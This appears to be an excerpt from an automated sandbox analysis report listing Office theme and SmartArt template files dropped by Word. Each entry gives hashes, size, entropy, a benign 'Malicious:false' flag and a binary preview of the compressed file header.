                                                                                                                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2218943
                                                                                                                                                Entropy (8bit):7.942378408801199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1750795
                                                                                                                                                Entropy (8bit):7.892395931401988
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2924237
                                                                                                                                                Entropy (8bit):7.970803022812704
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2357051
                                                                                                                                                Entropy (8bit):7.929430745829162
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3611324
                                                                                                                                                Entropy (8bit):7.965784120725206
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1091485
                                                                                                                                                Entropy (8bit):7.906659368807194
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):608122
                                                                                                                                                Entropy (8bit):7.729143855239127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5783
                                                                                                                                                Entropy (8bit):7.88616857639663
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4026
                                                                                                                                                Entropy (8bit):7.809492693601857
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4243
                                                                                                                                                Entropy (8bit):7.824383764848892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16806
                                                                                                                                                Entropy (8bit):7.9519793977093505
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):11380
                                                                                                                                                Entropy (8bit):7.891971054886943
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

